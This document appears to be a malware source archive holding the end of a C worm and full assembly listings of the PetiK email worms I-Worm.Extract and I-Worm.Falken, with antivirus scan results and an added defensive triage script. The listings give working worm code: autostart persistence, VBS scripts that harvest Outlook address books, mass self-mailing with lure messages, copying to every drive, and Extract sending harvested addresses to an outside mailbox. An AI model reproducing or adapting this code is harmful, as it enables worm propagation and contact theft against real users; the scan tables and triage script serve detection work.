memset(mes.lpFiles,0,sizeof(MapiFileDesc)); mes.lpFiles->lpszPathName=filename; mes.lpFiles->lpszFileName=attname; mes.nFileCount=1; mes.lpOriginator=&from; mSendMail(sess,0,&mes,0,0); free(mes.lpRecips); free(mes.lpFiles); } void Welcome() { Sleep(750); MessageBox(NULL,"Software installed on the system.","SETUP",MB_OK|MB_ICONINFORMATION); }

File Essence.scr received on 05.16.2009 11:31:23 (CET)

Antivirus | Version | Last Update | Result
a-squared | 4.0.0.101 | 2009.05.16 | Email-Worm.Win32.Stopin!IK
AhnLab-V3 | 5.0.0.2 | 2009.05.15 | Win32/Stopin.worm.24064
AntiVir | 7.9.0.168 | 2009.05.15 | Worm/Stopin.C
Antiy-AVL | 2.0.3.1 | 2009.05.15 | Worm/Win32.Stopin
Authentium | 5.1.2.4 | 2009.05.15 | W32/Heuristic-119!Eldorado
Avast | 4.8.1335.0 | 2009.05.15 | Win32:Stopin-B
AVG | 8.5.0.336 | 2009.05.15 | I-Worm/Stopin
BitDefender | 7.2 | 2009.05.16 | Win32.StopIn.B@mm
CAT-QuickHeal | 10.00 | 2009.05.15 | I-Worm.Stopin.c
ClamAV | 0.94.1 | 2009.05.15 | Worm.Stopin.C
Comodo | 1157 | 2009.05.08 | Worm.Win32.Stopin.C
DrWeb | 5.0.0.12182 | 2009.05.16 | Win32.HLLM.Stopin.50688
eSafe | 7.0.17.0 | 2009.05.14 | Win32.Stopin.c
eTrust-Vet | 31.6.6508 | 2009.05.16 | Win32/Stopin.A
F-Prot | 4.4.4.56 | 2009.05.15 | W32/Heuristic-119!Eldorado
F-Secure | 8.0.14470.0 | 2009.05.15 | Email-Worm.Win32.Stopin.c
Fortinet | 3.117.0.0 | 2009.05.16 | W32/Stopin.C!worm
GData | 19 | 2009.05.16 | Win32.StopIn.B@mm
Ikarus | T3.1.1.49.0 | 2009.05.16 | Email-Worm.Win32.Stopin
K7AntiVirus | 7.10.735 | 2009.05.14 | Email-Worm.Win32.Stopin.c
Kaspersky | 7.0.0.125 | 2009.05.16 | Email-Worm.Win32.Stopin.c
McAfee | 5616 | 2009.05.15 | W32/Stopin.c@MM
McAfee+Artemis | 5616 | 2009.05.15 | W32/Stopin.c@MM
McAfee-GW-Edition | 6.7.6 | 2009.05.15 | Worm.Stopin.C
Microsoft | 1.4602 | 2009.05.16 | Worm:Win32/Stopin.C@mm
NOD32 | 4080 | 2009.05.15 | Win32/Stopin.C
Norman | 6.01.05 | 2009.05.16 | W32/Stopin.C@mm
nProtect | 2009.1.8.0 | 2009.05.16 | Worm/W32.Stopin.24064
Panda | 10.0.0.14 | 2009.05.15 | W32/Stopin.C
PCTools | 4.4.2.0 | 2009.05.15 | I-Worm.Stopin.C
Prevx | 3.0 | 2009.05.16 | Medium Risk Malware
Rising | 21.29.52.00 | 2009.05.16 | Worm.Stopin.c
Sophos | 4.41.0 | 2009.05.16 | W32/Stopin-B
Sunbelt | 3.2.1858.2 | 2009.05.16 | Email-Worm.Win32.Stopin.c
Symantec | 1.4.4.12 | 2009.05.16 | W95.Pet_Tick.gen
TheHacker | 6.3.4.1.326 | 2009.05.15 | W32/Stopin.c
TrendMicro | 8.950.0.1092 | 2009.05.15 | WORM_STOPIN.B
VBA32 | 3.12.10.5 | 2009.05.16 | Win32.HLLW.Essence
ViRobot | 2009.5.15.1737 | 2009.05.15 | I-Worm.Win32.Stopin.C
VirusBuster | 4.6.5.0 | 2009.05.15 | I-Worm.Stopin.C

Additional information
File size: 24064 bytes
MD5: c5ca2b9bea18766448b54c7ecd4c887c
SHA1: 108ca819544e528b345e8afbc561b1ecda720102
PEiD: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser

comment # Name : I-Worm.Extract Author : PetiK Date : February 3rd 2002 - February 4th 2002 Size : 5632 Action : Extract API from DLL directly (the reason of the name of worm) Copy itself to %SYSDIR%\UPDATEW32.EXE Create "RUN=" in WIN.INI to start with computer Display fake message Send to extractcounter@multimania.com the WAB of Outlook Take theses adresses to sread itself with MAPI functions. On 29th display a message box # .586p .model flat .code JUMPS api macro a extrn a:proc call a endm include Useful.inc include myinclude.inc start_worm: @pushsz "KERNEL32.DLL" api GetModuleHandleA xchg eax,ebx kern macro push push api mov endm kern kern kern kern kern kern kern kern kern kern kern kern kern kern kern kern kern kern kern kern kern kern kern kern kern push mov push push call push x offset sz&x ebx GetProcAddress _ptk&x,eax CloseHandle CopyFileA CreateDirectoryA CreateFileA CreateFileMappingA DeleteFileA GetDateFormatA GetFileSize GetModuleFileNameA GetSystemDirectoryA GetSystemTime GetTimeFormatA GetWindowsDirectoryA lstrcat lstrcmp lstrcpy lstrlen MapViewOfFile SetCurrentDirectoryA Sleep UnmapViewOfFile WinExec WriteFile WriteProfileStringA WritePrivateProfileStringA 50 esi,offset orig_worm esi 0 _ptkGetModuleFileNameA 50

push offset verif_worm call _ptkGetSystemDirectoryA @pushsz "\UPDATEW32.EXE" push offset verif_worm call _ptklstrcat push push call test jz mov push push push call add mov stosd mov stosd mov stosd mov stosd pop copy_w: push push call esi offset verif_worm _ptklstrcmp eax,eax continue_worm edi,offset copy_worm edi 50 edi _ptkGetSystemDirectoryA edi,eax eax,"dpU\" eax,"Weta" eax,"e.23" eax,"ex" edi push 0 edi esi _ptkCopyFileA

run_w: push edi @pushsz "RUN" @pushsz "WINDOWS" call _ptkWriteProfileStringA call push push push api CreateDate 50 offset realname offset orig_worm GetFileTitleA

@pushsz " - " push offset date call _ptklstrcat push offset realname push offset date call _ptklstrcat f_mess: push 10h push offset date call @mess db "Cannot Open this File !",CRLF,CRLF db "If you downloaded this file, try downloading again.",0 @mess: push 0 api MessageBoxA jmp end_worm continue_worm: push 50 push offset vbsfile call _ptkGetWindowsDirectoryA @pushsz "\ExtractVbs.vbs" push offset vbsfile call _ptklstrcat push push push push push push push call xchg 0 20h 2 0 1 40000000h offset vbsfile _ptkCreateFileA eax,ebx

push push push push push call push call push push call push push call push call push call

0 offset octets e_vbs - s_vbs offset s_vbs ebx _ptkWriteFile ebx _ptkCloseHandle offset vbsfile offset vbsexec _ptklstrcpy 4 offset execcontrol _ptkWinExec 5000 _ptkSleep offset vbsfile _ptkDeleteFileA

payload: push offset Systime call _ptkGetSystemTime cmp [Systime.wDay],29 jne end_pay push 40h @pushsz "I-Worm.Extract" call e_mess db "Hi man, you received my worm !",CRLF db "Don't panic, it doesn't format your computer",CRLF,CRLF db 9,"Bye and Have a Nice Day.",0 e_mess: push 0 api MessageBoxA end_pay: sh_gsf: push 0 push 5 push offset progra push 0 api SHGetSpecialFolderPathA push offset progra call _ptkSetCurrentDirectoryA @pushsz "Update Windows 32bits" call _ptkCreateDirectoryA @pushsz "\Update Windows 32bits" push offset progra call _ptklstrcat push offset progra call _ptkSetCurrentDirectoryA push 0 @pushsz "MAJ.exe" push offset orig_worm call _ptkCopyFileA verif_inet: push push api dec jnz push push call push call 0 offset inet InternetGetConnectedState eax verif_inet 50 offset winpath _ptkGetWindowsDirectoryA offset winpath _ptkSetCurrentDirectoryA

spread: pushad push 00h push 80h push 03h push 00h push 01h push 80000000h @pushsz "Outlook_Addr.txt" call _ptkCreateFileA inc eax

je dec xchg xor push push push push push push call test je xchg xor push push push push push call test je xchg push push call cmp jbe

end_spread eax eax,ebx eax,eax eax eax eax 2 eax ebx _ptkCreateFileMappingA eax,eax end_s1 eax,ebp eax,eax eax eax eax 4 ebp _ptkMapViewOfFile eax,eax end_s2 eax,esi 0 ebx _ptkGetFileSize eax,4 end_s3

scan_mail: xor edx,edx mov edi,offset mail_addr push edi p_c: lodsb cmp al," " je car_s cmp al,";" je end_m cmp al,"#" je f_mail cmp al,'@' jne not_a inc edx not_a: stosb jmp p_c car_s: inc esi jmp p_c end_m: xor al,al stosb pop edi test edx,edx je scan_mail call send_mail jmp scan_mail f_mail: end_s3: call end_s2: call end_s1: call end_spread: end_worm: push api push esi _ptkUnmapViewOfFile push ebp _ptkCloseHandle push ebx _ptkCloseHandle popad 0 ExitProcess

send_mail: call CreateDate call CreateTime @pushsz "C:\liste.ini" push offset mail_addr push offset time

push call xor push push push push push api ret

offset date _ptkWritePrivateProfileStringA eax,eax eax eax offset Message eax [sess] MAPISendMail

CreateDate Proc pushad mov edi,offset date push 32 push edi @pushsz "dddd, dd MMMM yyyy" push 0 push 0 push 9 call _ptkGetDateFormatA popad ret CreateDate EndP CreateTime Proc pushad mov edi,offset time push 32 push edi @pushsz "HH:mm:ss" push 0 push 0 push 9 call _ptkGetTimeFormatA popad ret CreateTime EndP .data copy_worm orig_worm verif_worm vbsfile winpath progra mail_addr realname date time octets inet sess subject body

db db db db db db db db db db dd dd dd

50 dup (0) 50 dup (0) 50 dup (0) 50 dup (0) 50 dup (0) 50 dup (0) 128 dup (?) 50 dup (0) 30 dup (?) 9 dup (?) ? 0 0

db "Re: Check This...",0 db "Hi",CRLF db "This is the file you ask for. Open quickly ! It's very important",CRLF,CRLF db 9,"Best Regards",CRLF,CRLF,CRLF db "Salut,",CRLF db "Voici le fichier que tu cherches. Ouvre vite ! C'est très important",CRLF,CRLF db 9,"Mes sincères salutations",0 filename db "important.exe",0 Message dd dd dd dd dd dd dd dd dd dd dd dd ? offset subject offset body ? ? ? 2 offset MsgFrom 1 offset MsgTo 1 offset Attach

MsgFrom dd dd dd dd dd MsgTo dd dd dd dd dd dd dd dd dd dd dd ? ? ? ? ?

dd ?

? 1 offset mail_addr offset mail_addr ? ? dd ? ? ? offset orig_worm offset filename ? db db db db db db db db db db db db db db db db db db db db db db db db db "CloseHandle",0 "CopyFileA",0 "CreateDirectoryA",0 "CreateFileA",0 "CreateFileMappingA",0 "DeleteFileA",0 "GetDateFormatA",0 "GetFileSize",0 "GetModuleFileNameA",0 "GetSystemDirectoryA",0 "GetSystemTime",0 "GetTimeFormatA",0 "GetWindowsDirectoryA",0 "lstrcat",0 "lstrcmp",0 "lstrcpy",0 "lstrlen",0 "MapViewOfFile",0 "SetCurrentDirectoryA",0 "Sleep",0 "UnmapViewOfFile",0 "WinExec",0 "WriteFile",0 "WritePrivateProfileStringA",0 "WriteProfileStringA",0 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? dd ?

Attach

szCloseHandle szCopyFileA szCreateDirectoryA szCreateFileA szCreateFileMappingA szDeleteFileA szGetDateFormatA szGetFileSize szGetModuleFileNameA szGetSystemDirectoryA szGetSystemTime szGetTimeFormatA szGetWindowsDirectoryA szlstrcat szlstrcmp szlstrcpy szlstrlen szMapViewOfFile szSetCurrentDirectoryA szSleep szUnmapViewOfFile szWinExec szWriteFile szWritePrivateProfileStringA szWriteProfileStringA

_ptkCloseHandle dd _ptkCopyFileA dd _ptkCreateDirectoryA dd _ptkCreateFileA dd _ptkCreateFileMappingA dd _ptkDeleteFileA dd _ptkGetDateFormatA dd _ptkGetFileSize dd _ptkGetModuleFileNameA dd _ptkGetSystemDirectoryA dd _ptkGetSystemTime dd _ptkGetTimeFormatA dd _ptkGetWindowsDirectoryA dd _ptklstrcat dd _ptklstrcmp dd _ptklstrcpy dd _ptklstrlen dd _ptkMapViewOfFile dd _ptkSetCurrentDirectoryA dd _ptkSleep dd _ptkUnmapViewOfFile dd _ptkWinExec dd _ptkWriteFile dd _ptkWriteProfileStringA dd _ptkWritePrivateProfileStringA

s_vbs: db 'On Error Resume Next',CRLF db 'Set f=CreateObject("Scripting.FileSystemObject")',CRLF db 'Set win=f.GetSpecialFolder(0)',CRLF db 'Set c=f.CreateTextFile(win&"\Outlook_Addr.txt")',CRLF

db db db db db db db db db db db db db db db e_vbs:

'c.Close',CRLF 'Set out=CreateObject("Outlook.Application")',CRLF 'Set mapi=out.GetNameSpace("MAPI")',CRLF 'adr="extractcounter@multimania.com"',CRLF 'For Each mail in mapi.AddressLists',CRLF 'If mail.AddressEntries.Count <> 0 Then',CRLF 'For O=1 To mail.AddressEntries.Count',CRLF 'adr=adr &";"& mail.AddressEntries(O).Address',CRLF 'Next',CRLF 'End If',CRLF 'Next',CRLF 'adr=adr &";#"',CRLF,CRLF 'Set c=f.OpenTextFile(win&"\Outlook_Addr.txt",2)',CRLF 'c.WriteLine adr',CRLF 'c.Close',CRLF

execcontrol db "wscript " vbsexec db 50 dup (0) db "",0 end start_worm end
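As an added defender-side example (not code from the PetiK archive), the following Python triage check looks for the autostart and address-harvest artefacts that the Twin, Essence and Extract listings above leave on a machine: the Run-key value names, dropped executable names and harvest file names are taken from those listings, while the sample WIN.INI, Run-key export and file list are constructed.

```python
# Added defender-side example, not code from the PetiK archive: an offline triage
# check for the autostart and address-harvest artefacts the Twin, Essence and
# Extract listings above create. Indicator names come from those listings; the
# sample inputs at the bottom are constructed.
import re
from typing import Dict, List, Tuple

# Run-key value names written by the listings (Twin: "AntiVirus Freeware",
# Essence: "Microsoft IE") and the copies the worms drop
# (Extract: UPDATEW32.EXE and MAJ.exe, Essence: Msie32.exe, Twin: AVW32.exe).
KNOWN_RUN_VALUE_NAMES = {"antivirus freeware", "microsoft ie"}
KNOWN_DROPPED_EXES = {"updatew32.exe", "maj.exe", "msie32.exe", "avw32.exe"}
# Files the dropped VBS scripts use to hand harvested Outlook addresses back to
# the worm (Twin: backup.win, twin.vbs; Extract: Outlook_Addr.txt,
# ExtractVbs.vbs, liste.ini).
HARVEST_FILES = {"backup.win", "twin.vbs", "outlook_addr.txt",
                 "extractvbs.vbs", "liste.ini"}

Finding = Tuple[str, str]  # (where it was found, human-readable detail)


def parse_ini(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal INI parser: section and key names are folded to lower case,
    blank lines and ';' comments are skipped, values keep their case."""
    sections: Dict[str, Dict[str, str]] = {}
    current = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        key, sep, value = line.partition("=")
        if sep:
            sections.setdefault(current, {})[key.strip().lower()] = value.strip()
    return sections


def exe_name(command: str) -> str:
    """File name of the program a command line starts, lower-cased. Handles a
    quoted path containing spaces and drops any arguments."""
    cmd = command.strip()
    if cmd.startswith('"'):
        first = cmd[1:].split('"', 1)[0]
    else:
        first = cmd.split()[0] if cmd else ""
    return re.split(r"[\\/]", first)[-1].lower()


def check_win_ini(text: str) -> List[Finding]:
    """Report [windows] run= and load= entries, the WIN.INI autostart that
    Extract sets through WriteProfileStringA("WINDOWS","RUN",...). Every
    non-empty entry is reported, since nothing legitimate uses this mechanism
    any more; a known worm copy is called out by name."""
    findings: List[Finding] = []
    windows = parse_ini(text).get("windows", {})
    for key in ("run", "load"):
        value = windows.get(key, "")
        if not value:
            continue
        for item in value.split(","):  # run= accepts a comma-separated list
            item = item.strip()
            name = exe_name(item)
            if name in KNOWN_DROPPED_EXES:
                findings.append(("win.ini", f"{key}= starts known worm copy {name}: {item}"))
            else:
                findings.append(("win.ini", f"{key}= autostart entry: {item}"))
    return findings


def check_run_entries(entries: List[Tuple[str, str]]) -> List[Finding]:
    """entries are (value name, command) pairs exported from
    HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run, the key Twin and
    Essence write to. Match on the value name or on the started executable."""
    findings: List[Finding] = []
    for name, command in entries:
        if name.lower() in KNOWN_RUN_VALUE_NAMES or exe_name(command) in KNOWN_DROPPED_EXES:
            findings.append(("run-key", f"{name!r} -> {command}"))
    return findings


def check_dropped_files(paths: List[str]) -> List[Finding]:
    """Flag paths whose file name is one of the address-harvest files."""
    return [("file", p) for p in paths
            if re.split(r"[\\/]", p)[-1].lower() in HARVEST_FILES]


def triage(win_ini_text: str, run_entries: List[Tuple[str, str]],
           paths: List[str]) -> List[Finding]:
    """Run all three checks and return the combined findings."""
    return (check_win_ini(win_ini_text) + check_run_entries(run_entries)
            + check_dropped_files(paths))


# Constructed sample inputs: a WIN.INI, a Run-key export and a directory listing
# showing Extract and Essence artefacts next to benign entries.
SAMPLE_WIN_INI = r"""[windows]
load=
run=C:\WINDOWS\SYSTEM\UPDATEW32.EXE
[Desktop]
Wallpaper=(None)
"""
SAMPLE_RUN_ENTRIES = [
    ("Microsoft IE", r"C:\WINDOWS\SYSTEM\Msie32.exe"),
    ("ctfmon.exe", r"C:\WINDOWS\system32\ctfmon.exe"),
]
SAMPLE_PATHS = [r"C:\WINDOWS\Outlook_Addr.txt", r"C:\WINDOWS\win.ini"]

if __name__ == "__main__":
    for where, detail in triage(SAMPLE_WIN_INI, SAMPLE_RUN_ENTRIES, SAMPLE_PATHS):
        print(f"[{where}] {detail}")
```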

File Extract.exe received on 05.16.2009 11:58:04 (CET)
Antivirus: a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot
Version: 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.735 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737
Last Update: 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15
Result: Trojan-Downloader.Win32.Small!IK Win32/Petik.worm.5632 Worm/Petik.2 Worm/Win32.Win32 W32/Malware!76bd Win32:Extract I-Worm/Petik Win32.Petik.I@mm I-Worm.Petik Worm.Win32.Petik.Y Win32.Petik.8192 Suspicious File Win32/Petik.5632.B W32/Malware!76bd Email-Worm.Win32.Petik W32/Petik!worm Win32.Petik.I@mm Trojan-Downloader.Win32.Small Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/PetTick@MM W32/PetTick@MM Worm.Petik.2 Worm:Win32/Petick.Y@mm Win32/Petik.Y W32/Pet_Tick.5632.C Worm/W32.Petik.5632.C W32/Extract I-Worm.Tractex.A Medium Risk Malware Worm.Mail.Petik.k W32/Petik-L Email-Worm.Win32.Petik W95.Pet_Tick.gen W32/Petik WORM_PETIK.L Win32.Worm.Extract I-Worm.Win32.PetTick.5632.B

Additional information
File size: 5632 bytes
MD5: f6c5adc3869b24363a81d283908a9978
SHA1: 8451ec7b8f6b487cd39d3d5ea9acdafc27116b28
PEiD: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser

comment # Name : I-Worm.Falken Author : PetiK Date : February 5th 2002 - February 8th 2002 Size : 6144 Action : # .586p .model flat .code JUMPS api macro a extrn a:proc call a endm include Useful.inc start_worm: @pushsz "KERNEL32.DLL" api GetModuleHandleA xchg eax,ebx kern macro push push api mov endm kern kern kern kern kern kern kern kern kern kern kern kern kern kern kern kern kern kern kern kern push mov push push call x offset sz&x ebx GetProcAddress _ptk&x,eax CloseHandle CopyFileA CreateFileA CreateFileMappingA DeleteFileA GetFileSize GetModuleFileNameA GetSystemDirectoryA GetTickCount GetWindowsDirectoryA lstrcat MapViewOfFile SetCurrentDirectoryA SetFilePointer Sleep UnmapViewOfFile WinExec WriteFile WritePrivateProfileStringA WriteProfileStringA 50 esi,offset orig_worm esi 0 _ptkGetModuleFileNameA

mov edi,offset copy_worm push edi push 50 push edi call _ptkGetSystemDirectoryA add edi,eax mov al,"\" stosb call _ptkGetTickCount push 9 pop ecx xor edx,edx div ecx inc edx mov ecx,edx copy_g: push ecx

call push pop xor div xchg add stosb call push pop xor div push call pop loop mov stosd pop

_ptkGetTickCount 'z'-'a' ecx edx,edx ecx eax,edx al,'a' _ptkGetTickCount 100 ecx edx,edx ecx edx _ptkSleep ecx copy_g eax,"exe." edi

push 50 push offset wininit call _ptkGetWindowsDirectoryA @pushsz "\WININIT.INI" push offset wininit call _ptklstrcat push offset wininit push esi @pushsz "NUL" @pushsz "rename" call _ptkWritePrivateProfileStringA copy_w: push push call push 0 edi esi _ptkCopyFileA

run_w: push edi @pushsz "RUN" @pushsz "WINDOWS" call _ptkWriteProfileStringA spread_system: call @lect db "D:\",0 db "E:\",0 db "F:\",0 db "G:\",0 db "H:\",0 db "I:\",0 db "J:\",0 db "K:\",0 db "L:\",0 db "M:\",0 db "N:\",0 db "O:\",0 db "P:\",0 db "Q:\",0 db "R:\",0 db "S:\",0 db "T:\",0 db "U:\",0 db "V:\",0 db "W:\",0 db "X:\",0 db "Y:\",0 db "Z:\",0 @lect: pop esi push 23 pop ecx loop_lect: push ecx push esi call _ptkSetCurrentDirectoryA push 0 @pushsz "winbackup.exe"

push offset orig_worm call _ptkCopyFileA @endsz pop ecx loop loop_lect end_spread_system: payload: call _ptkGetTickCount xor edx,edx mov ecx,20 div ecx cmp edx,2 jne end_payload push 10h @pushsz "I-Worm.Falken" call @messpay db "This is the last warning before the attack.",CRLF db "United States have to stop controling the world.",0 @messpay: push 0 api MessageBoxA end_payload: prep_spread_worm: push 0 push 20h push 2 push 0 push 1 push 40000000h @pushsz "C:\falken.vbs" call _ptkCreateFileA xchg eax,ebx push 0 push offset octets push e_vbs - s_vbs push offset s_vbs push ebx call _ptkWriteFile push ebx call _ptkCloseHandle push 1 @pushsz "wscript C:\falken.vbs" call _ptkWinExec push 2000 call _ptkSleep @pushsz "C:\falken.vbs" call _ptkDeleteFileA verif_inet: push push api dec jnz push push call push call 0 offset inet InternetGetConnectedState eax verif_inet 50 offset syspath _ptkGetSystemDirectoryA offset syspath _ptkSetCurrentDirectoryA

spread: pushad push 00h push 80h push 03h push 00h push 01h push 80000000h @pushsz "falkenspread.txt" call _ptkCreateFileA inc eax je end_spread dec eax xchg eax,ebx xor eax,eax

push push push push push push call test je xchg xor push push push push push call test je xchg push push call cmp jbe

eax eax eax 2 eax ebx _ptkCreateFileMappingA eax,eax end_s1 eax,ebp eax,eax eax eax eax 4 ebp _ptkMapViewOfFile eax,eax end_s2 eax,esi 0 ebx _ptkGetFileSize eax,4 end_s3

scan_mail: xor edx,edx mov edi,offset mail_addr push edi p_c: lodsb cmp al," " je car_s cmp al,";" je end_m cmp al,"#" je f_mail cmp al,'@' jne not_a inc edx not_a: stosb jmp p_c car_s: inc esi jmp p_c end_m: mov counter,0 end_l: xor al,al stosb inc counter cmp counter,20 jne end_l pop edi test edx,edx je scan_mail call send_mail jmp scan_mail f_mail: end_s3: call end_s2: call end_s1: call end_spread: push esi _ptkUnmapViewOfFile push ebp _ptkCloseHandle push ebx _ptkCloseHandle popad

@pushsz "falkenspread.txt" call _ptkDeleteFileA end_worm: push api send_mail: xor push push 0 ExitProcess eax,eax eax eax

push push push api

offset Message eax [sess] MAPISendMail

push 0 push 80h push 4 push 0 push 1 push 40000000h @pushsz "falkenliste.txt" call _ptkCreateFileA xchg eax,ebx push push push push call push push push push push call push call ret 2 0 0 ebx _ptkSetFilePointer 0 offset octets e_liste - s_liste offset s_liste ebx _ptkWriteFile ebx _ptkCloseHandle

.data copy_worm orig_worm wininit lect syspath octets counter inet sess subject body filename Message

db db db db db dd dd dd dd db db db db db dd dd dd dd dd dd dd dd dd dd dd

50 50 50 50 50 ? ? 0 0

dup dup dup dup dup

(0) (0) (0) (0) (0)

"Last Warning !",0 "Message for Everybody,",CRLF "Open this file to see what we speak about.",CRLF,CRLF 9,"Best Regards",0 "open.exe",0 dd ? offset subject offset body ? ? ? 2 offset MsgFrom 1 offset MsgTo 1 offset Attach dd ? ? ? ? ? ? ? 1 offset mail_addr offset mail_addr ? ? dd ?

MsgFrom dd dd dd dd dd MsgTo dd dd dd dd dd dd

Attach

dd dd dd dd dd

? ? offset orig_worm offset filename ? db db db db db db db db db db db db db db db db db db db db "CloseHandle",0 "CopyFileA",0 "CreateFileA",0 "CreateFileMappingA",0 "DeleteFileA",0 "GetFileSize",0 "GetModuleFileNameA",0 "GetSystemDirectoryA",0 "GetTickCount",0 "GetWindowsDirectoryA",0 "lstrcat",0 "MapViewOfFile",0 "SetCurrentDirectoryA",0 "SetFilePointer",0 "Sleep",0 "UnmapViewOfFile",0 "WinExec",0 "WriteFile",0 "WritePrivateProfileStringA",0 "WriteProfileStringA",0 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? dd ? ?

szCloseHandle szCopyFileA szCreateFileA szCreateFileMappingA szDeleteFileA szGetFileSize szGetModuleFileNameA szGetSystemDirectoryA szGetTickCount szGetWindowsDirectoryA szlstrcat szMapViewOfFile szSetCurrentDirectoryA szSetFilePointer szSleep szUnmapViewOfFile szWinExec szWriteFile szWritePrivateProfileStringA szWriteProfileStringA

_ptkCloseHandle dd _ptkCopyFileA dd _ptkCreateFileA dd _ptkCreateFileMappingA dd _ptkDeleteFileA dd _ptkGetFileSize dd _ptkGetModuleFileNameA dd _ptkGetSystemDirectoryA dd _ptkGetTickCount dd _ptkGetWindowsDirectoryA dd _ptklstrcat dd _ptkMapViewOfFile dd _ptkSetCurrentDirectoryA dd _ptkSetFilePointer dd _ptkSleep dd _ptkUnmapViewOfFile dd _ptkWinExec dd _ptkWriteFile dd _ptkWritePrivateProfileStringA _ptkWriteProfileStringA dd s_vbs: db db db db db db db db db db db db db db db db db db db

'On Error Resume Next',CRLF 'Set fs=CreateObject("Scripting.FileSystemObject")',CRLF 'Set sys=fs.GetSpecialFolder(1)',CRLF 'Set c=fs.CreateTextFile(sys&"\falkenspread.txt")',CRLF 'c.Close',CRLF 'Set ou=CreateObject("Outlook.Application")',CRLF 'Set map=ou.GetNameSpace("MAPI")',CRLF 'adr=""',CRLF 'For Each mel in map.AddressLists',CRLF 'If mel.AddressEntries.Count <> 0 Then',CRLF 'For O=1 To mel.AddressEntries.Count',CRLF 'adr=adr &";"& mel.AddressEntries(O).Address',CRLF 'Next',CRLF 'End If',CRLF 'Next',CRLF 'adr=adr &";#"',CRLF,CRLF 'Set c=fs.OpenTextFile(sys&"\falkenspread.txt",2)',CRLF 'c.WriteLine adr',CRLF 'c.Close',CRLF

e_vbs: s_liste: db "mailto : > " mail_addr db 50 dup (0) db " ",CRLF e_liste: end start_worm end

File Falken.exe received on 05.16.2009 11:58:11 (CET)

Antivirus          Version         Last Update
a-squared          4.0.0.101       2009.05.16
AhnLab-V3          5.0.0.2         2009.05.15
AntiVir            7.9.0.168       2009.05.15
Antiy-AVL          2.0.3.1         2009.05.15
Authentium         5.1.2.4         2009.05.15
Avast              4.8.1335.0      2009.05.15
AVG                8.5.0.336       2009.05.15
BitDefender        7.2             2009.05.16
CAT-QuickHeal      10.00           2009.05.15
ClamAV             0.94.1          2009.05.15
Comodo             1157            2009.05.08
DrWeb              5.0.0.12182     2009.05.16
eSafe              7.0.17.0        2009.05.14
eTrust-Vet         31.6.6508       2009.05.16
F-Prot             4.4.4.56        2009.05.15
F-Secure           8.0.14470.0     2009.05.15
Fortinet           3.117.0.0       2009.05.16
GData              19              2009.05.16
Ikarus             T3.1.1.49.0     2009.05.16
K7AntiVirus        7.10.735        2009.05.14
Kaspersky          7.0.0.125       2009.05.16
McAfee             5616            2009.05.15
McAfee+Artemis     5616            2009.05.15
McAfee-GW-Edition  6.7.6           2009.05.15
Microsoft          1.4602          2009.05.16
NOD32              4080            2009.05.15
Norman             6.01.05         2009.05.16
nProtect           2009.1.8.0      2009.05.16
Panda              10.0.0.14       2009.05.16
PCTools            4.4.2.0         2009.05.15
Prevx              3.0             2009.05.16
Rising             21.29.52.00     2009.05.16
Sophos             4.41.0          2009.05.16
Sunbelt            3.2.1858.2      2009.05.16
Symantec           1.4.4.12        2009.05.16
TheHacker          6.3.4.1.326     2009.05.15
TrendMicro         8.950.0.1092    2009.05.15
VBA32              3.12.10.5       2009.05.16
ViRobot            2009.5.15.1737  2009.05.15
VirusBuster        4.6.5.0         2009.05.15

Result (38 detection names, in the order given; the mapping to individual engines is not preserved): Email-Worm.Win32.Petik!IK, Win32/Pettick.worm.6144, Worm/Petik.1, Worm/Win32.Win32, W32/NewMalware-NetWatcher!Eldorado, Win32:Falkon, I-Worm/Petik, Win32.Petik.G@mm, I-Worm.Petik, Worm.Win32.Petik.AC, Win32.Petik.8192, Suspicious File, Win32/Falcon.A, W32/NewMalware-NetWatcher!Eldorado, Email-Worm.Win32.Petik, W32/Petik!worm, Win32.Petik.G@mm, Email-Worm.Win32.Petik, Email-Worm.Win32.Petik, Email-Worm.Win32.Petik, W32/PetTick@MM, W32/PetTick@MM, Worm.Petik.1, Worm:Win32/Petick.Z@mm, Win32/Petik.AC, W32/Pet_Tick.6144.C, Worm/W32.Petik.6144, Worm Generic, I-Worm.Tractex.B, Medium Risk Malware, Worm.Mail.Petik.j, W32/Petik-P, Email-Worm.Win32.Petik, W95.Pet_Tick.gen, W32/Petik, WORM_FALKEN.A, Win32.Worm.Falken, I-Worm.Tractex.B

Additional information
File size: 6144 bytes
MD5...: f19278caf2e95e3abd31ad269e1b0814
SHA1..: 4b202c2aabe0a59addf103626cfb304835ecda2e
